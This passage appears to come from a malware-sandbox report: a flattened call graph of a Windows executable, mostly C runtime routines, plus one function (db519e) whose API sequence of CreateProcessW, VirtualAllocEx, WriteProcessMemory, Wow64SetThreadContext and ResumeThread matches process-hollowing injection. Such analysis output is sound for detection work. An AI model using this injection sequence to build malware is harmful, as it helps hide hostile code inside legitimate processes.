14036 d9b1fc 14035->14036 14037 d9e4f7 ___free_lconv_mon 14 API calls 14036->14037 14038 d9b202 14037->14038 14038->14020 14040 d9b3ed 14039->14040 14046 d9b38b 14039->14046 14040->14017 14041 d9e641 WideCharToMultiByte std::_Locinfo::_Locinfo_dtor 14041->14046 14042 d9f807 __dosmaperr 14 API calls 14042->14046 14043 d9b3f1 14044 d9e4f7 ___free_lconv_mon 14 API calls 14043->14044 14044->14040 14046->14040 14046->14041 14046->14042 14046->14043 14047 d9e4f7 ___free_lconv_mon 14 API calls 14046->14047 14338 da4926 14046->14338 14047->14046 14049 d9b1c1 14048->14049 14050 da0055 14048->14050 14054 da484f GetEnvironmentStringsW 14049->14054 14097 d9e83e 14050->14097 14055 da4867 14054->14055 14060 d9b1c6 14054->14060 14056 d9e641 std::_Locinfo::_Locinfo_dtor WideCharToMultiByte 14055->14056 14057 da4884 14056->14057 14058 da4899 14057->14058 14059 da488e FreeEnvironmentStringsW 14057->14059 14061 d9e531 __fread_nolock 15 API calls 14058->14061 14059->14060 14060->14029 14060->14030 14062 da48a0 14061->14062 14063 da48a8 14062->14063 14064 da48b9 14062->14064 14065 d9e4f7 ___free_lconv_mon 14 API calls 14063->14065 14066 d9e641 std::_Locinfo::_Locinfo_dtor WideCharToMultiByte 14064->14066 14067 da48ad FreeEnvironmentStringsW 14065->14067 14068 da48c9 14066->14068 14067->14060 14069 da48d8 14068->14069 14070 da48d0 14068->14070 14072 d9e4f7 ___free_lconv_mon 14 API calls 14069->14072 14071 d9e4f7 ___free_lconv_mon 14 API calls 14070->14071 14073 da48d6 FreeEnvironmentStringsW 14071->14073 14072->14073 14073->14060 14076 d9b2af 14075->14076 14077 d9f807 __dosmaperr 14 API calls 14076->14077 14078 d9b2d6 14077->14078 14079 d9b2de 14078->14079 14087 d9b2e8 14078->14087 14080 d9e4f7 ___free_lconv_mon 14 API calls 14079->14080 14096 d9b1df 14080->14096 14081 d9b345 14082 d9e4f7 ___free_lconv_mon 14 API calls 14081->14082 14082->14096 14083 d9f807 __dosmaperr 14 API calls 14083->14087 14084 d9b354 14332 d9b23f 14084->14332 14087->14081 14087->14083 14087->14084 14089 d9b36f 14087->14089 14092 d9e4f7 ___free_lconv_mon 14 API calls 14087->14092 14323 d9e16c 14087->14323 14093 d9b485 __Getctype 11 API calls 14089->14093 14090 d9e4f7 ___free_lconv_mon 14 API calls 14091 d9b361 14090->14091 14094 d9e4f7 ___free_lconv_mon 14 API calls 14091->14094 14092->14087 14095 d9b37b 14093->14095 14094->14096 14096->14035 14098 d9e849 14097->14098 14099 d9e84f 14097->14099 14100 d9f19b __dosmaperr 6 API calls 14098->14100 14101 d9f1da __dosmaperr 6 API calls 14099->14101 14103 d9e855 14099->14103 14100->14099 14102 d9e869 14101->14102 14102->14103 14105 d9f807 __dosmaperr 14 API calls 14102->14105 14104 d9b9c2 CallUnexpected 39 API calls 14103->14104 14121 d9e85a 14103->14121 14106 d9e8d3 14104->14106 14107 d9e879 14105->14107 14108 d9e881 14107->14108 14109 d9e896 14107->14109 14111 d9f1da __dosmaperr 6 API calls 14108->14111 14110 d9f1da __dosmaperr 6 API calls 14109->14110 14112 d9e8a2 14110->14112 14118 d9e88d 14111->14118 14113 d9e8b5 14112->14113 14114 d9e8a6 14112->14114 14117 d9ea94 __dosmaperr 14 API calls 14113->14117 14116 d9f1da __dosmaperr 6 API calls 14114->14116 14115 d9e4f7 ___free_lconv_mon 14 API calls 14115->14103 14116->14118 14119 d9e8c0 14117->14119 14118->14115 14120 d9e4f7 ___free_lconv_mon 14 API calls 14119->14120 14120->14121 14122 da040d 14121->14122 14123 da0437 14122->14123 14144 da0299 14123->14144 14128 da0469 14131 d9e4f7 ___free_lconv_mon 14 API calls 14128->14131 14129 da0477 14158 da0094 14129->14158 14132 da0450 14131->14132 14132->14049 14134 da04af 14135 d9ad6d __strnicoll 14 API calls 14134->14135 14136 da04b4 14135->14136 14139 d9e4f7 ___free_lconv_mon 14 API calls 14136->14139 14137 da04f6 14138 da053f 14137->14138 14169 da07c8 14137->14169 14142 d9e4f7 ___free_lconv_mon 14 API calls 14138->14142 14139->14132 14140 da04ca 14140->14137 14143 d9e4f7 ___free_lconv_mon 14 API calls 14140->14143 14142->14132 14143->14137 14177 d97e1a 14144->14177 14147 da02ba GetOEMCP 14149 da02e3 14147->14149 14148 da02cc 14148->14149 14150 da02d1 GetACP 14148->14150 14149->14132 14151 d9e531 14149->14151 14150->14149 14152 d9e56f 14151->14152 14156 d9e53f __dosmaperr 14151->14156 14153 d9ad6d __strnicoll 14 API calls 14152->14153 14155 d9e56d 14153->14155 14154 d9e55a RtlAllocateHeap 14154->14155 14154->14156 14155->14128 14155->14129 14156->14152 14156->14154 14157 d98f08 std::ios_base::_Init 2 API calls 14156->14157 14157->14156 14159 da0299 41 API calls 14158->14159 14160 da00b4 14159->14160 14162 da00f1 IsValidCodePage 14160->14162 14167 da01b9 14160->14167 14168 da010c __fread_nolock 14160->14168 14161 d929c6 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 5 API calls 14163 da0297 14161->14163 14164 da0103 14162->14164 14162->14167 14163->14134 14163->14140 14165 da012c GetCPInfo 14164->14165 14164->14168 14165->14167 14165->14168 14167->14161 14217 da0623 14168->14217 14170 da07d4 ___scrt_is_nonwritable_in_current_image 14169->14170 14297 d9b750 EnterCriticalSection 14170->14297 14172 da07de 14298 da0562 14172->14298 14178 d97e31 14177->14178 14179 d97e38 14177->14179 14178->14147 14178->14148 14179->14178 14180 d9e783 _unexpected 39 API calls 14179->14180 14181 d97e59 14180->14181 14185 d9ed66 14181->14185 14186 d9ed79 14185->14186 14187 d97e6f 14185->14187 14186->14187 14193 da2046 14186->14193 14189 d9ed93 14187->14189 14190 d9eda6 14189->14190 14192 d9edbb 14189->14192 14190->14192 14214 da0039 14190->14214 14192->14178 14194 da2052 ___scrt_is_nonwritable_in_current_image 14193->14194 14195 d9e783 _unexpected 39 API calls 14194->14195 14196 da205b 14195->14196 14197 da20a1 14196->14197 14206 d9b750 EnterCriticalSection 14196->14206 14197->14187 14199 da2079 14207 da20c7 14199->14207 14204 d9b9c2 CallUnexpected 39 API calls 14205 da20c6 14204->14205 14206->14199 14208 da20d5 __Getctype 14207->14208 14210 da208a 14207->14210 14209 da1e7b __Getctype 14 API calls 14208->14209 14208->14210 14209->14210 14211 da20a6 14210->14211 14212 d9b767 std::_Lockit::~_Lockit LeaveCriticalSection 14211->14212 14213 da209d 14212->14213 14213->14197 14213->14204 14215 d9e783 _unexpected 39 API calls 14214->14215 14216 da003e 14215->14216 14216->14192 14218 da064b GetCPInfo 14217->14218 14227 da0714 14217->14227 14223 da0663 14218->14223 14218->14227 14220 d929c6 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 5 API calls 14222 da07c6 14220->14222 14222->14167 14228 d9faf3 14223->14228 14227->14220 14229 d97e1a __strnicoll 39 API calls 14228->14229 14230 d9fb13 14229->14230 14248 d9e57f 14230->14248 14232 d9fbcf 14234 d929c6 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 5 API calls 14232->14234 14233 d9fbc7 14251 d954a7 14233->14251 14237 d9fbf2 14234->14237 14235 d9fb40 14235->14232 14235->14233 14236 d9e531 __fread_nolock 15 API calls 14235->14236 14239 d9fb65 __fread_nolock __alloca_probe_16 14235->14239 14236->14239 14243 d9fbf4 14237->14243 14239->14233 14240 d9e57f __strnicoll MultiByteToWideChar 14239->14240 14241 d9fbae 14240->14241 14241->14233 14242 d9fbb5 GetStringTypeW 14241->14242 14242->14233 14244 d97e1a __strnicoll 39 API calls 14243->14244 14255 d9e5a9 14248->14255 14252 d954b1 14251->14252 14253 d954c2 14251->14253 14252->14253 14257 d9c522 14252->14257 14253->14232 14256 d9e59b MultiByteToWideChar 14255->14256 14256->14235 14258 d9e4f7 ___free_lconv_mon 14 API calls 14257->14258 14297->14172 14308 d9c20e 14298->14308 14300 da0584 14301 d9c20e __fread_nolock 29 API calls 14300->14301 14302 da05a3 14301->14302 14309 d9c21f 14308->14309 14318 d9c21b _Yarn 14308->14318 14310 d9c226 14309->14310 14314 d9c239 __fread_nolock 14309->14314 14311 d9ad6d __strnicoll 14 API calls 14310->14311 14312 d9c22b 14311->14312 14313 d9b458 __strnicoll 29 API calls 14312->14313 14313->14318 14315 d9c270 14314->14315 14316 d9c267 14314->14316 14314->14318 14315->14318 14320 d9ad6d __strnicoll 14 API calls 14315->14320 14317 d9ad6d __strnicoll 14 API calls 14316->14317 14319 d9c26c 14317->14319 14318->14300 14320->14319 14324 d9e188 14323->14324 14325 d9e17a 14323->14325 14326 d9ad6d __strnicoll 14 API calls 14324->14326 14325->14324 14328 d9e1a0 14325->14328 14331 d9e190 14326->14331 14327 d9b458 __strnicoll 29 API calls 14329 d9e19a 14327->14329 14328->14329 14330 d9ad6d __strnicoll 14 API calls 14328->14330 14329->14087 14330->14331 14331->14327 14333 d9b269 14332->14333 14334 d9b24c 14332->14334 14333->14090 14335 d9b263 14334->14335 14336 d9e4f7 ___free_lconv_mon 14 API calls 14334->14336 14337 d9e4f7 ___free_lconv_mon 14 API calls 14335->14337 14336->14334 14337->14333 14339 da4931 14338->14339 14340 da4942 14339->14340 14344 da4955 ___from_strstr_to_strchr 14339->14344 14341 d9ad6d __strnicoll 14 API calls 14340->14341 14342 da4947 14341->14342 14342->14046 14343 da4b6c 14346 d9ad6d __strnicoll 14 API calls 14343->14346 14344->14343 14345 da4975 14344->14345 14401 da4b91 14345->14401 14348 da4b71 14346->14348 14350 d9e4f7 ___free_lconv_mon 14 API calls 14348->14350 14350->14342 14351 da49bb 14353 d9f807 __dosmaperr 14 API calls 14351->14353 14368 da49a5 14351->14368 14356 da49c9 14353->14356 14354 d9e4f7 ___free_lconv_mon 14 API calls 14354->14342 14359 d9e4f7 ___free_lconv_mon 14 API calls 14356->14359 14357 da4997 14360 da49a0 14357->14360 14361 da49b4 14357->14361 14358 da4a2e 14363 d9e4f7 ___free_lconv_mon 14 API calls 14358->14363 14364 da49d4 14359->14364 14365 d9ad6d __strnicoll 14 API calls 14360->14365 14362 da4b91 39 API calls 14361->14362 14366 da49b9 14362->14366 14373 da4a36 14363->14373 14364->14366 14364->14368 14371 d9f807 __dosmaperr 14 API calls 14364->14371 14365->14368 14366->14368 14405 da4bab 14366->14405 14367 da4a79 14367->14368 14369 da3f46 std::ios_base::_Init 32 API calls 14367->14369 14368->14354 14370 da4aa7 14369->14370 14372 d9e4f7 ___free_lconv_mon 14 API calls 14370->14372 14375 da49f0 14371->14375 14378 da4a63 14372->14378 14373->14378 14409 da3f46 14373->14409 14374 da4b61 14376 d9e4f7 ___free_lconv_mon 14 API calls 14374->14376 14379 d9e4f7 ___free_lconv_mon 14 API calls 14375->14379 14376->14342 14378->14368 14378->14374 14378->14378 14382 d9f807 __dosmaperr 14 API calls 14378->14382 14379->14366 14380 da4a5a 14381 d9e4f7 ___free_lconv_mon 14 API calls 14380->14381 14381->14378 14383 da4af2 14382->14383 14384 da4afa 14383->14384 14385 da4b02 14383->14385 14386 d9e4f7 ___free_lconv_mon 14 API calls 14384->14386 14387 d9e16c ___std_exception_copy 29 API calls 14385->14387 14386->14368 14388 da4b0e 14387->14388 14389 da4b86 14388->14389 14390 da4b15 14388->14390 14391 d9b485 __Getctype 11 API calls 14389->14391 14418 da9a5c 14390->14418 14393 da4b90 14391->14393 14395 da4b5b 14396 da4b3c 14402 da4980 14401->14402 14403 da4b9e 14401->14403 14402->14351 14402->14357 14402->14366 14433 da4c00 14403->14433 14406 da4bc1 14405->14406 14408 da4a1e 14405->14408 14406->14408 14448 da996b 14406->14448 14408->14358 14408->14367 14410 da3f6e 14409->14410 14411 da3f53 14409->14411 14413 da3f7d 14410->14413 14548 da9604 14410->14548 14411->14410 14412 da3f5f 14411->14412 14414 d9ad6d __strnicoll 14 API calls 14412->14414 14555 da757c 14413->14555 14417 da3f64 __fread_nolock 14414->14417 14417->14380 14567 d9f7c8 14418->14567 14423 d9f7c8 39 API calls 14426 da9aac 14423->14426 14424 da9adb 14428 da4b36 14424->14428 14429 d9e4f7 ___free_lconv_mon 14 API calls 14424->14429 14425 da9acf 14425->14424 14427 d9e4f7 ___free_lconv_mon 14 API calls 14425->14427 14430 d97f14 17 API calls 14426->14430 14427->14424 14428->14395 14428->14396 14429->14428 14431 da9ab9 14430->14431 14431->14425 14434 da4c13 14433->14434 14435 da4c0e 14433->14435 14436 d9f807 __dosmaperr 14 API calls 14434->14436 14435->14402 14445 da4c30 14436->14445 14437 da4c9e 14438 d9b9c2 CallUnexpected 39 API calls 14437->14438 14440 da4ca3 14438->14440 14439 da4c8d 14441 d9e4f7 ___free_lconv_mon 14 API calls 14439->14441 14442 d9b485 __Getctype 11 API calls 14440->14442 14441->14435 14443 da4caf 14442->14443 14444 d9f807 __dosmaperr 14 API calls 14444->14445 14445->14437 14445->14439 14445->14440 14445->14444 14446 d9e4f7 ___free_lconv_mon 14 API calls 14445->14446 14447 d9e16c ___std_exception_copy 29 API calls 14445->14447 14446->14445 14447->14445 14449 da9979 14448->14449 14450 da997f 14448->14450 14452 daa0fb 14449->14452 14456 daa0b3 14449->14456 14466 da9994 14450->14466 14486 daa111 14452->14486 14455 daa0b9 14458 d9ad6d __strnicoll 14 API calls 14455->14458 14456->14455 14459 daa0d6 14456->14459 14457 daa0c9 14457->14406 14460 daa0be 14458->14460 14462 d9ad6d __strnicoll 14 API calls 14459->14462 14465 daa0f4 14459->14465 14461 d9b458 __strnicoll 29 API calls 14460->14461 14461->14457 14463 daa0e5 14462->14463 14464 d9b458 __strnicoll 29 API calls 14463->14464 14464->14457 14465->14406 14467 d97e1a __strnicoll 39 API calls 14466->14467 14468 da99aa 14467->14468 14469 da99c6 14468->14469 14470 da99dd 14468->14470 14479 da998f 14468->14479 14471 d9ad6d __strnicoll 14 API calls 14469->14471 14472 da99f8 14470->14472 14473 da99e6 14470->14473 14474 da99cb 14471->14474 14477 da9a18 14472->14477 14478 da9a05 14472->14478 14476 d9ad6d __strnicoll 14 API calls 14473->14476 14475 d9b458 __strnicoll 29 API calls 14474->14475 14475->14479 14480 da99eb 14476->14480 14504 daa1dc 14477->14504 14481 daa111 __strnicoll 39 API calls 14478->14481 14479->14406 14483 d9b458 __strnicoll 29 API calls 14480->14483 14481->14479 14483->14479 14485 d9ad6d __strnicoll 14 API calls 14485->14479 14487 daa13b 14486->14487 14488 daa121 14486->14488 14490 daa15a 14487->14490 14491 daa143 14487->14491 14489 d9ad6d __strnicoll 14 API calls 14488->14489 14494 daa126 14489->14494 14492 daa17d 14490->14492 14493 daa166 14490->14493 14495 d9ad6d __strnicoll 14 API calls 14491->14495 14501 d97e1a __strnicoll 39 API calls 14492->14501 14503 daa131 14492->14503 14496 d9ad6d __strnicoll 14 API calls 14493->14496 14497 d9b458 __strnicoll 29 API calls 14494->14497 14498 daa148 14495->14498 14500 daa16b 14496->14500 14497->14503 14499 d9b458 __strnicoll 29 API calls 14498->14499 14499->14503 14502 d9b458 __strnicoll 29 API calls 14500->14502 14501->14503 14502->14503 14503->14457 14505 d97e1a __strnicoll 39 API calls 14504->14505 14506 daa1ef 14505->14506 14509 daa222 14506->14509 14511 daa256 __strnicoll 14509->14511 14510 d929c6 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 5 API calls 14512 da9a2e 14510->14512 14513 daa2d6 14511->14513 14514 daa4ba 14511->14514 14516 daa2c3 GetCPInfo 14511->14516 14521 daa2da 14511->14521 14512->14479 14512->14485 14515 d9e57f __strnicoll MultiByteToWideChar 14513->14515 14513->14521 14518 daa35c 14515->14518 14516->14513 14516->14521 14517 daa4ae 14519 d954a7 __freea 14 API calls 14517->14519 14518->14517 14520 d9e531 __fread_nolock 15 API calls 14518->14520 14518->14521 14522 daa383 __alloca_probe_16 14518->14522 14519->14521 14520->14522 14521->14510 14521->14514 14522->14517 14523 d9e57f __strnicoll MultiByteToWideChar 14522->14523 14524 daa3cf 14523->14524 14524->14517 14525 d9e57f __strnicoll MultiByteToWideChar 14524->14525 14526 daa3eb 14525->14526 14526->14517 14527 daa3f9 14526->14527 14529 d9e531 __fread_nolock 15 API calls 14527->14529 14532 daa412 __alloca_probe_16 14527->14532 14536 daa45c 14527->14536 14528 d954a7 __freea 14 API calls 14530 daa462 14528->14530 14529->14532 14533 d9e57f __strnicoll MultiByteToWideChar 14532->14533 14532->14536 14534 daa455 14533->14534 14534->14536 14536->14528 14549 da960f 14548->14549 14550 da9624 HeapSize 14548->14550 14551 d9ad6d __strnicoll 14 API calls 14549->14551 14550->14413 14552 da9614 14551->14552 14553 d9b458 __strnicoll 29 API calls 14552->14553 14554 da961f 14553->14554 14554->14413 14556 da7589 14555->14556 14557 da7594 14555->14557 14558 d9e531 __fread_nolock 15 API calls 14556->14558 14559 da759c 14557->14559 14565 da75a5 __dosmaperr 14557->14565 14564 da7591 14558->14564 14562 d9e4f7 ___free_lconv_mon 14 API calls 14559->14562 14560 da75aa 14563 d9ad6d __strnicoll 14 API calls 14560->14563 14561 da75cf HeapReAlloc 14561->14564 14561->14565 14562->14564 14563->14564 14564->14417 14565->14560 14565->14561 14566 d98f08 std::ios_base::_Init 2 API calls 14565->14566 14566->14565 14568 d97e1a __strnicoll 39 API calls 14567->14568 14569 d9f7da 14568->14569 14570 d9f7ec 14569->14570 14575 d9f04d 14569->14575 14572 d97f14 14570->14572 14581 d97f6c 14572->14581 14578 d9f5b9 14575->14578 14579 d9f534 std::_Lockit::_Lockit 5 API calls 14578->14579 14580 d9f055 14579->14580 14580->14570 14582 d97f7a 14581->14582 14583 d97f94 14581->14583 14599 d97efa 14582->14599 14585 d97f9b 14583->14585 14586 d97fba 14583->14586 14598 d97f2c 14585->14598 14603 d97ebb 14585->14603 14587 d9e57f __strnicoll MultiByteToWideChar 14586->14587 14589 d97fc9 14587->14589 14590 d97fd0 GetLastError 14589->14590 14592 d97ff6 14589->14592 14595 d97ebb 15 API calls 14589->14595 14608 d9ad93 14590->14608 14593 d9e57f __strnicoll MultiByteToWideChar 14592->14593 14592->14598 14596 d9800d 14593->14596 14595->14592 14596->14590 14596->14598 14598->14423 14598->14425 14600 d97f0d 14599->14600 14601 d97f05 14599->14601 14600->14598 14602 d9e4f7 ___free_lconv_mon 14 API calls 14601->14602 14602->14600 14604 d97efa 14 API calls 14603->14604 14605 d97ec9 14604->14605 14613 d97e9c 14605->14613 14616 d9ad80 14608->14616 14614 d9e531 __fread_nolock 15 API calls 14613->14614 14615 d97ea9 14614->14615 14615->14598 14617 d9e8d4 __dosmaperr 14 API calls 14616->14617 14620 d929c6 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 5 API calls 14619->14620 14621 d958ca 14620->14621 14621->13540 14623 d98d4e 14622->14623 14632 d98d5f 14622->14632 14624 d94fcd CallUnexpected GetModuleHandleW 14623->14624 14626 d98d53 14624->14626 14626->14632 14633 d98c55 GetModuleHandleExW 14626->14633 14628 d98c0d 14628->13511 14638 d98ebb 14632->14638 14634 d98c94 GetProcAddress 14633->14634 14637 d98ca8 14633->14637 14634->14637 14635 d98cbb FreeLibrary 14636 d98cc4 14635->14636 14636->14632 14637->14635 14637->14636 14639 d98ec7 ___scrt_is_nonwritable_in_current_image 14638->14639 14653 d9b750 EnterCriticalSection 14639->14653 14641 d98ed1 14654 d98db8 14641->14654 14643 d98ede 14658 d98efc 14643->14658 14646 d98cf0 14683 d98cd7 14646->14683 14648 d98cfa 14649 d98d0e 14648->14649 14650 d98cfe GetCurrentProcess TerminateProcess 14648->14650 14651 d98c55 CallUnexpected 3 API calls 14649->14651 14650->14649 14652 d98d16 ExitProcess 14651->14652 14653->14641 14656 d98dc4 ___scrt_is_nonwritable_in_current_image CallUnexpected 14654->14656 14655 d98e28 CallUnexpected 14655->14643 14656->14655 14661 d9aa87 14656->14661 14682 d9b767 LeaveCriticalSection 14658->14682 14660 d98d97 14660->14628 14660->14646 14662 d9aa93 __EH_prolog3 14661->14662 14665 d9ad12 14662->14665 14664 d9aaba std::ios_base::_Init 14664->14655 14666 d9ad1e ___scrt_is_nonwritable_in_current_image 14665->14666 14673 d9b750 EnterCriticalSection 14666->14673 14668 d9ad2c 14674 d9abdd 14668->14674 14673->14668 14675 d9abf4 14674->14675 14676 d9abfc 14674->14676 14678 d9ad61 14675->14678 14676->14675 14677 d9e4f7 ___free_lconv_mon 14 API calls 14676->14677 14677->14675 14681 d9b767 LeaveCriticalSection 14678->14681 14680 d9ad4a 14680->14664 14681->14680 14682->14660 14686 da0f55 14683->14686 14685 d98cdc CallUnexpected 14685->14648 14687 da0f64 CallUnexpected 14686->14687 14688 da0f71 14687->14688 14690 d9f3e7 14687->14690 14688->14685 14691 d9f534 std::_Lockit::_Lockit 5 API calls 14690->14691 14692 d9f403 14691->14692 14692->14688 14694 d986a9 ___scrt_uninitialize_crt 14693->14694 14695 d98697 14693->14695 14694->13549 14696 d986a5 14695->14696 14698 d9bbb9 14695->14698 14696->13549 14701 d9bce4 14698->14701 14704 d9bdbd 14701->14704 14705 d9bdc9 ___scrt_is_nonwritable_in_current_image 14704->14705 14712 d9b750 EnterCriticalSection 14705->14712 14707 d9bdd3 ___scrt_uninitialize_crt 14708 d9be3f 14707->14708 14713 d9bd31 14707->14713 14721 d9be5d 14708->14721 14712->14707 14714 d9bd3d ___scrt_is_nonwritable_in_current_image 14713->14714 14724 d9875f EnterCriticalSection 14714->14724 14716 d9bd47 ___scrt_uninitialize_crt 14717 d9bd80 14716->14717 14725 d9bbc2 14716->14725 14736 d9bdb1 14717->14736 14837 d9b767 LeaveCriticalSection 14721->14837 14723 d9bbc0 14723->14696 14724->14716 14726 d9bbd7 _Fputc 14725->14726 14727 d9bbe9 14726->14727 14728 d9bbde 14726->14728 14739 d9bc27 14727->14739 14729 d9bce4 ___scrt_uninitialize_crt 68 API calls 14728->14729 14733 d9bbe4 _Fputc 14729->14733 14733->14717 14734 d9bc0a 14752 da5164 14734->14752 14836 d98773 LeaveCriticalSection 14736->14836 14738 d9bd9f 14738->14707 14740 d9bbf3 14739->14740 14741 d9bc40 14739->14741 14740->14733 14745 da0efc 14740->14745 14741->14740 14742 da0efc _Fputc 29 API calls 14741->14742 14743 d9bc5c 14742->14743 14763 da549f 14743->14763 14746 da0f08 14745->14746 14747 da0f1d 14745->14747 14748 d9ad6d __strnicoll 14 API calls 14746->14748 14747->14734 14749 da0f0d 14748->14749 14750 d9b458 __strnicoll 29 API calls 14749->14750 14751 da0f18 14750->14751 14751->14734 14753 da5175 14752->14753 14756 da5182 14752->14756 14754 d9ad6d __strnicoll 14 API calls 14753->14754 14762 da517a 14754->14762 14755 da51cb 14757 d9ad6d __strnicoll 14 API calls 14755->14757 14756->14755 14758 da51a9 14756->14758 14759 da51d0 14757->14759 14806 da51e1 14758->14806 14761 d9b458 __strnicoll 29 API calls 14759->14761 14761->14762 14762->14733 14766 da54ab ___scrt_is_nonwritable_in_current_image 14763->14766 14764 da54b3 14764->14740 14765 da54ec 14768 d9b601 _Fputc 29 API calls 14765->14768 14766->14764 14766->14765 14767 da5532 14766->14767 14774 da4ef9 EnterCriticalSection 14767->14774 14768->14764 14770 da5538 14771 da5556 14770->14771 14775 da5283 14770->14775 14803 da55a8 14771->14803 14774->14770 14776 da52ab 14775->14776 14800 da52ce __fread_nolock 14775->14800 14777 da52af 14776->14777 14779 da530a 14776->14779 14778 d9b601 _Fputc 29 API calls 14777->14778 14778->14800 14780 da4033 _Fputc 31 API calls 14779->14780 14782 da5328 14779->14782 14780->14782 14781 da55b0 _Fputc 40 API calls 14782->14781 14800->14771 14804 da4f1c __fread_nolock LeaveCriticalSection 14803->14804 14805 da55ae 14804->14805 14805->14764 14807 da51ed ___scrt_is_nonwritable_in_current_image 14806->14807 14819 da4ef9 EnterCriticalSection 14807->14819 14809 da51fc 14817 da5241 14809->14817 14820 da4cb0 14809->14820 14810 d9ad6d __strnicoll 14 API calls 14817->14810 14819->14809 14821 da4cbd 14820->14821 14822 da4cd2 14820->14822 14823 d9ad80 __dosmaperr 14 API calls 14821->14823 14825 d9ad80 __dosmaperr 14 API calls 14822->14825 14827 da4cf7 14822->14827 14836->14738 14837->14723 13480 db519e 13481 db51d4 13480->13481 13482 db5321 GetPEB 13481->13482 13483 db5333 CreateProcessW VirtualAlloc Wow64GetThreadContext ReadProcessMemory VirtualAllocEx 13481->13483 13482->13483 13483->13481 13484 db53da WriteProcessMemory 13483->13484 13485 db541f 13484->13485 13486 db5461 WriteProcessMemory Wow64SetThreadContext ResumeThread 13485->13486 13487 db5424 WriteProcessMemory 13485->13487 13487->13485 15822 d942bc 15823 d942c8 15822->15823 15824 d942ff 15823->15824 15828 d9cc2c 15823->15828 15826 d942ec 15826->15824 15827 d94362 29 API calls 15826->15827 15827->15824 15829 d9cc3f _Fputc 15828->15829 15832 d9cc99 15829->15832 15831 d9cc54 _Fputc 15831->15826 15833 d9ccab 15832->15833 15834 d9ccce 15832->15834 15835 d9b601 _Fputc 29 API calls 15833->15835 15834->15833 15837 d9ccf5 15834->15837 15836 d9ccc6 15835->15836 15836->15831 15840 d9cdcf 15837->15840 15841 d9cddb ___scrt_is_nonwritable_in_current_image 15840->15841 15848 d9875f EnterCriticalSection 15841->15848 15843 d9cde9 15849 d9cd2f 15843->15849 15845 d9cdf6 15858 d9ce1e 15845->15858 15848->15843 15850 d9bc27 ___scrt_uninitialize_crt 64 API calls 15849->15850 15851 d9cd4a 15850->15851 15861 da0d89 15851->15861 15854 d9f807 __dosmaperr 14 API calls 15855 d9cd93 15854->15855 15856 d9e4f7 ___free_lconv_mon 14 API calls 15855->15856 15857 d9cd6f 15856->15857 15857->15845 15865 d98773 LeaveCriticalSection 15858->15865 15860 d9cd2d 15860->15831 15862 da0da0 15861->15862 15864 d9cd54 15861->15864 15863 d9e4f7 ___free_lconv_mon 14 API calls 15862->15863 15862->15864 15863->15864 15864->15854 15864->15857 15865->15860 17248 d93fa3 17250 d93fb9 _Yarn 17248->17250 17249 d93fbf 17250->17249 17251 d94065 17250->17251 17254 d9c32c 17250->17254 17251->17249 17253 d9c32c __fread_nolock 45 API calls 17251->17253 17253->17249 17257 d9c28f 17254->17257 17258 d9c29b ___scrt_is_nonwritable_in_current_image 17257->17258 17259 d9c2e5 17258->17259 17261 d9c2ae __fread_nolock 17258->17261 17269 d9c2d3 17258->17269 17270 d9875f EnterCriticalSection 17259->17270 17262 d9ad6d __strnicoll 14 API calls 17261->17262 17264 d9c2c8 17262->17264 17263 d9c2ef 17271 d9c349 17263->17271 17266 d9b458 __strnicoll 29 API calls 17264->17266 17266->17269 17269->17250 17270->17263 17273 d9c35b __fread_nolock 17271->17273 17278 d9c306 17271->17278 17272 d9c368 17274 d9ad6d __strnicoll 14 API calls 17272->17274 17273->17272 17273->17278 17283 d9c3b9 17273->17283 17275 d9c36d 17274->17275 17276 d9b458 __strnicoll 29 API calls 17275->17276 17276->17278 17277 da5d52 __fread_nolock 43 API calls 17277->17283 17285 d9c324 17278->17285 17279 d9c4e4 __fread_nolock 17281 d9ad6d __strnicoll 14 API calls 17279->17281 17280 d9c20e __fread_nolock 29 API calls 17280->17283 17281->17275 17282 da0efc _Fputc 29 API calls 17282->17283 17283->17277 17283->17278 17283->17279 17283->17280 17283->17282 17284 da625d __fread_nolock 41 API calls 17283->17284 17284->17283 17288 d98773 LeaveCriticalSection 17285->17288 17287 d9c32a 17287->17269 17288->17287 15886 d9884f 15887 d9bbb9 ___scrt_uninitialize_crt 68 API calls 15886->15887 15888 d98857 15887->15888 15896 da0cde 15888->15896 15890 d9885c 15891 da0d89 14 API calls 15890->15891 15892 d9886b DeleteCriticalSection 15891->15892 15892->15890 15893 d98886 15892->15893 15894 d9e4f7 ___free_lconv_mon 14 API calls 15893->15894 15895 d98891 15894->15895 15897 da0cea ___scrt_is_nonwritable_in_current_image 15896->15897 15906 d9b750 EnterCriticalSection 15897->15906 15899 da0d61 15911 da0d80 15899->15911 15901 da0cf5 15901->15899 15903 da0d35 DeleteCriticalSection 15901->15903 15907 d9ba11 15901->15907 15904 d9e4f7 ___free_lconv_mon 14 API calls 15903->15904 15904->15901 15906->15901 15908 d9ba24 _Fputc 15907->15908 15914 d9bacf 15908->15914 15910 d9ba30 _Fputc 15910->15901 15986 d9b767 LeaveCriticalSection 15911->15986 15913 da0d6d 15913->15890 15915 d9badb ___scrt_is_nonwritable_in_current_image 15914->15915 15916 d9bae5 15915->15916 15918 d9bb08 15915->15918 15917 d9b601 _Fputc 29 API calls 15916->15917 15924 d9bb00 15917->15924 15918->15924 15925 d9875f EnterCriticalSection 15918->15925 15920 d9bb26 15926 d9ba41 15920->15926 15922 d9bb33 15940 d9bb5e 15922->15940 15924->15910 15925->15920 15927 d9ba4e 15926->15927 15928 d9ba71 15926->15928 15929 d9b601 _Fputc 29 API calls 15927->15929 15930 d9ba69 15928->15930 15931 d9bc27 ___scrt_uninitialize_crt 64 API calls 15928->15931 15929->15930 15930->15922 15932 d9ba89 15931->15932 15933 da0d89 14 API calls 15932->15933 15934 d9ba91 15933->15934 15935 da0efc _Fputc 29 API calls 15934->15935 15936 d9ba9d 15935->15936 15943 da4ff5 15936->15943 15939 d9e4f7 ___free_lconv_mon 14 API calls 15939->15930 15985 d98773 LeaveCriticalSection 15940->15985 15942 d9bb64 15942->15924 15945 da501e 15943->15945 15947 d9baa4 15943->15947 15944 da506d 15946 d9b601 _Fputc 29 API calls 15944->15946 